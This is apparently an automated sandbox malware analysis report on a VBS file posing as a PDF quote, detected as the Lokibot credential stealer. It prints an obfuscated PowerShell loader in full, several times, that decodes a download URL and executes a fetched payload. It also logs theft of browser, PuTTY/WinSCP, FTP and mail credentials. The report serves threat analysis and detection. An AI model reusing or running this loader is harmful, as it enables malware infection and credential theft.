enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#linnas kandidtwr overskyet ecdysial hjlandene providentialism selekteringer #>;$rystelses='makeress';<#plungy firdobling preferrers aftvingende encoders hardier forsvarschefernes #>;$hvsnings=$host.privatedata;if ($hvsnings) {$narrishkeit++;}function atomangreb($antipapistical246){$bondske=$fremmeligst+$antipapistical246.length-$narrishkeit;for( $halfheartednesses=5;$halfheartednesses -lt $bondske;$halfheartednesses+=6){$minkfarven+=$antipapistical246[$halfheartednesses];}$minkfarven;}function rme($stillehavsflaadernes){ . ($posthume) ($stillehavsflaadernes);}$gulvmaattens=atomangreb 'spinamb ugeosade zskyldid.rivltsarelpartea hexi/ uror5angin. prod0a.tin manom(skonnwmyoepibarsen migodunaudo sulfwsnv.es lati kons nbaan.tiniti kldni1regis0bolig.kirop0opsam; civi antyw pub ivir,lnwid.w6rance4 igna;alene a,tabxreemk6crabb4speci;handl irettral,miv budg:midda1colpe2n dbr1bombe. hosl0under)ambit subelgrenteeu eldcvalthkmeethohyper/in,ho2 dune0 etnk1 list0 medb0nark 1subef0alder1 onr wicksfvaginitwi.trb rguephanefsci,soenga,xvandl/gstel1 umsk2 feri1skaks.,inkl0 lge ';$librettoens=atomangreb ' alibu tea,s circesui trbegav- geopa storginhomeia.hingarrutdisge ';$broderierne=atomangreb 'dimplhantietdistitgastepb,nusskrake:ungdo/funkt/over.d b llr selviafd,ivr vieeafkri.drogsg reklobidraobe,vegin.mulmarkser,gnf.figetctuberofamldm tang/.asteubev.dcp eud?lammieworkuxudsk.pdunbaotilm rrehant p lm=unuandcaddiomaskiwkinemnvbnenldelsao snivaatolldtegni&alumrism gsdbendi= paal1 uriniindtjs recrl a acudrapezm.dermsilenfdataijlige 8su co9 dobbm knusoto fl5contofornam9ingenglingul tomhosko euzarisount,ul skdyyrefluvcanon7udtmtqadmetemos itunderw,avsprdividtfattirtransupalma ';$udviskning=atomangreb 'stose>nedfr ';$posthume=atomangreb 'bargiimarkoe skibx oso ';$cassina='kendetegner';$dentine='\smaalige.eks';rme (atomangreb 'rabat$noncog tap lnacroo enlsbe segapsychlstagn:antiso oodvbo ene alkarforbecpsa oogrundam rcet bire= dy,t$ .ispemedionvatikv orev:tr chapredapbarfop scled fraiamatert eskaavigil+bes,a$dem edb rmae andrnseawat oomsispi.nnproloeha de ');rme (atomangreb ' viva$pedotgdisselt rmkosairlb pretaflig.lclogg: klasuremain sregs uspet hoveu agidspa ei op,eereadodperp.nsaddueanke s,oextskommu=te,te$driveb urmart llgokarnedbioloevrlesrheterinons e,athiroleosninpute succ.illu.s phy p swi.lfusibiserpetekstr(a ous$anti,uunderdg udev,ndiui mprosunshak opmanorga itroopn j.ckgfarth)staal ');rme (atomangreb ',arak[ kortnpneumeso attskovb.skrmfsoverpegarnerenjoyvslowmibauxicu.eskebrndepundiso.ealiifladfn non ts,okimprvepasquifnportea gonogdemimeafspnrotten] rip :fagbl: mainsf emmekontrcbud rulektir knowi mldttto nfyshantpver er kammosymmet vo dofl.decstratostranlmodpa heter=mini brneb[drot n,erieeraah t.umle.forfrsfilosemyretcstjfruudlaargar libilbotspilly tartphock,repiclopapert s liotagkacfrsteo li,ilcoh,bt yanoy aurepbeclaetypec]prize:antnd
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#linnas kandidtwr overskyet ecdysial hjlandene providentialism selekteringer #>;$rystelses='makeress';<#plungy firdobling preferrers aftvingende encoders hardier forsvarschefernes #>;$hvsnings=$host.privatedata;if ($hvsnings) {$narrishkeit++;}function atomangreb($antipapistical246){$bondske=$fremmeligst+$antipapistical246.length-$narrishkeit;for( $halfheartednesses=5;$halfheartednesses -lt $bondske;$halfheartednesses+=6){$minkfarven+=$antipapistical246[$halfheartednesses];}$minkfarven;}function rme($stillehavsflaadernes){ . ($posthume) ($stillehavsflaadernes);}$gulvmaattens=atomangreb 'spinamb ugeosade zskyldid.rivltsarelpartea hexi/ uror5angin. prod0a.tin manom(skonnwmyoepibarsen migodunaudo sulfwsnv.es lati kons nbaan.tiniti kldni1regis0bolig.kirop0opsam; civi antyw pub ivir,lnwid.w6rance4 igna;alene a,tabxreemk6crabb4speci;handl irettral,miv budg:midda1colpe2n dbr1bombe. hosl0under)ambit subelgrenteeu eldcvalthkmeethohyper/in,ho2 dune0 etnk1 list0 medb0nark 1subef0alder1 onr wicksfvaginitwi.trb rguephanefsci,soenga,xvandl/gstel1 umsk2 feri1skaks.,inkl0 lge ';$librettoens=atomangreb ' alibu tea,s circesui trbegav- geopa storginhomeia.hingarrutdisge ';$broderierne=atomangreb 'dimplhantietdistitgastepb,nusskrake:ungdo/funkt/over.d b llr selviafd,ivr vieeafkri.drogsg reklobidraobe,vegin.mulmarkser,gnf.figetctuberofamldm tang/.asteubev.dcp eud?lammieworkuxudsk.pdunbaotilm rrehant p lm=unuandcaddiomaskiwkinemnvbnenldelsao snivaatolldtegni&alumrism gsdbendi= paal1 uriniindtjs recrl a acudrapezm.dermsilenfdataijlige 8su co9 dobbm knusoto fl5contofornam9ingenglingul tomhosko euzarisount,ul skdyyrefluvcanon7udtmtqadmetemos itunderw,avsprdividtfattirtransupalma ';$udviskning=atomangreb 'stose>nedfr ';$posthume=atomangreb 'bargiimarkoe skibx oso ';$cassina='kendetegner';$dentine='\smaalige.eks';rme (atomangreb 'rabat$noncog tap lnacroo enlsbe segapsychlstagn:antiso oodvbo ene alkarforbecpsa oogrundam rcet bire= dy,t$ .ispemedionvatikv orev:tr chapredapbarfop scled fraiamatert eskaavigil+bes,a$dem edb rmae andrnseawat oomsispi.nnproloeha de ');rme (atomangreb ' viva$pedotgdisselt rmkosairlb pretaflig.lclogg: klasuremain sregs uspet hoveu agidspa ei op,eereadodperp.nsaddueanke s,oextskommu=te,te$driveb urmart llgokarnedbioloevrlesrheterinons e,athiroleosninpute succ.illu.s phy p swi.lfusibiserpetekstr(a ous$anti,uunderdg udev,ndiui mprosunshak opmanorga itroopn j.ckgfarth)staal ');rme (atomangreb ',arak[ kortnpneumeso attskovb.skrmfsoverpegarnerenjoyvslowmibauxicu.eskebrndepundiso.ealiifladfn non ts,okimprvepasquifnportea gonogdemimeafspnrotten] rip :fagbl: mainsf emmekontrcbud rulektir knowi mldttto nfyshantpver er kammosymmet vo dofl.decstratostranlmodpa heter=mini brneb[drot n,erieeraah t.umle.forfrsfilosemyretcstjfruudlaargar libilbotspilly tartphock,repiclopapert s liotagkacfrsteo li,ilcoh,bt yanoy aurepbeclaetypec]prize:antnd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#linnas kandidtwr overskyet ecdysial hjlandene providentialism selekteringer #>;$rystelses='makeress';<#plungy firdobling preferrers aftvingende encoders hardier forsvarschefernes #>;$hvsnings=$host.privatedata;if ($hvsnings) {$narrishkeit++;}function atomangreb($antipapistical246){$bondske=$fremmeligst+$antipapistical246.length-$narrishkeit;for( $halfheartednesses=5;$halfheartednesses -lt $bondske;$halfheartednesses+=6){$minkfarven+=$antipapistical246[$halfheartednesses];}$minkfarven;}function rme($stillehavsflaadernes){ . ($posthume) ($stillehavsflaadernes);}$gulvmaattens=atomangreb 'spinamb ugeosade zskyldid.rivltsarelpartea hexi/ uror5angin. prod0a.tin manom(skonnwmyoepibarsen migodunaudo sulfwsnv.es lati kons nbaan.tiniti kldni1regis0bolig.kirop0opsam; civi antyw pub ivir,lnwid.w6rance4 igna;alene a,tabxreemk6crabb4speci;handl irettral,miv budg:midda1colpe2n dbr1bombe. hosl0under)ambit subelgrenteeu eldcvalthkmeethohyper/in,ho2 dune0 etnk1 list0 medb0nark 1subef0alder1 onr wicksfvaginitwi.trb rguephanefsci,soenga,xvandl/gstel1 umsk2 feri1skaks.,inkl0 lge ';$librettoens=atomangreb ' alibu tea,s circesui trbegav- geopa storginhomeia.hingarrutdisge ';$broderierne=atomangreb 'dimplhantietdistitgastepb,nusskrake:ungdo/funkt/over.d b llr selviafd,ivr vieeafkri.drogsg reklobidraobe,vegin.mulmarkser,gnf.figetctuberofamldm tang/.asteubev.dcp eud?lammieworkuxudsk.pdunbaotilm rrehant p lm=unuandcaddiomaskiwkinemnvbnenldelsao snivaatolldtegni&alumrism gsdbendi= paal1 uriniindtjs recrl a acudrapezm.dermsilenfdataijlige 8su co9 dobbm knusoto fl5contofornam9ingenglingul tomhosko euzarisount,ul skdyyrefluvcanon7udtmtqadmetemos itunderw,avsprdividtfattirtransupalma ';$udviskning=atomangreb 'stose>nedfr ';$posthume=atomangreb 'bargiimarkoe skibx oso ';$cassina='kendetegner';$dentine='\smaalige.eks';rme (atomangreb 'rabat$noncog tap lnacroo enlsbe segapsychlstagn:antiso oodvbo ene alkarforbecpsa oogrundam rcet bire= dy,t$ .ispemedionvatikv orev:tr chapredapbarfop scled fraiamatert eskaavigil+bes,a$dem edb rmae andrnseawat oomsispi.nnproloeha de ');rme (atomangreb ' viva$pedotgdisselt rmkosairlb pretaflig.lclogg: klasuremain sregs uspet hoveu agidspa ei op,eereadodperp.nsaddueanke s,oextskommu=te,te$driveb urmart llgokarnedbioloevrlesrheterinons e,athiroleosninpute succ.illu.s phy p swi.lfusibiserpetekstr(a ous$anti,uunderdg udev,ndiui mprosunshak opmanorga itroopn j.ckgfarth)staal ');rme (atomangreb ',arak[ kortnpneumeso attskovb.skrmfsoverpegarnerenjoyvslowmibauxicu.eskebrndepundiso.ealiifladfn non ts,okimprvepasquifnportea gonogdemimeafspnrotten] rip :fagbl: mainsf emmekontrcbud rulektir knowi mldttto nfyshantpver er kammosymmet vo dofl.decstratostranlmodpa heter=mini brneb[drot n,erieeraah t.umle.forfrsfilosemyretcstjfruudlaargar libilbotspilly tartphock,repiclopapert s liotagkacfrsteo li,ilcoh,bt yanoy aurepbeclaetypec]prize:antnd	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 1900, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\dxdiag.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\dxdiag.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\dxdiag.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 1900, type: MEMORYSTR

ID:	1523162
Product:	CloudBasic
Start time:	07:48:38
Start date:	01.10.2024
Sample:	Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	34273527e12e172917598d0e29994432
SHA1:	d390fd4b4ffc45be0a7cf05765af19e402377640
SHA256:	2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	3A925CB766CE4286E251C26E90B55CE8	3FA8EE6E901101A4661723B94D6C9309E281BD28	4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tgk4xkj.rz5.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afmvo5dc.y3v.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_moapwhuv.uif.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qiely0ic.ldy.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\188E93\31437F.exe	PE32 executable (GUI) Intel 80386, for MS Windows	24D3F0DB6CCF0C341EA4F6B206DF2EDF	B65ED4B4B1FB9CC5C128EE48A0B7CD326BA3AC93	C36C36C2945802FEB2195AD271C98F994B22A09F6CF2A1764A190865D1D6CE2B
C:\Users\user\AppData\Roaming\188E93\31437F.lck	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06	data	DAB633BEBCCE13575989DCFA4E2203D6	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
C:\Users\user\AppData\Roaming\Smaalige.Eks	ASCII text, with very long lines (65536), with no line terminators	743E8AA7E1D11F204B239E36BAFC481E	A42AFAD52FDA74DECB6DEB3A12DEACFC6F639873	9FF25A7EBBCF8054D44FD7A23BD936D6A6B7D44E813301872DCB74BBCF918390

Windows Analysis Report
Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs

Malware Threat Intel
Provided by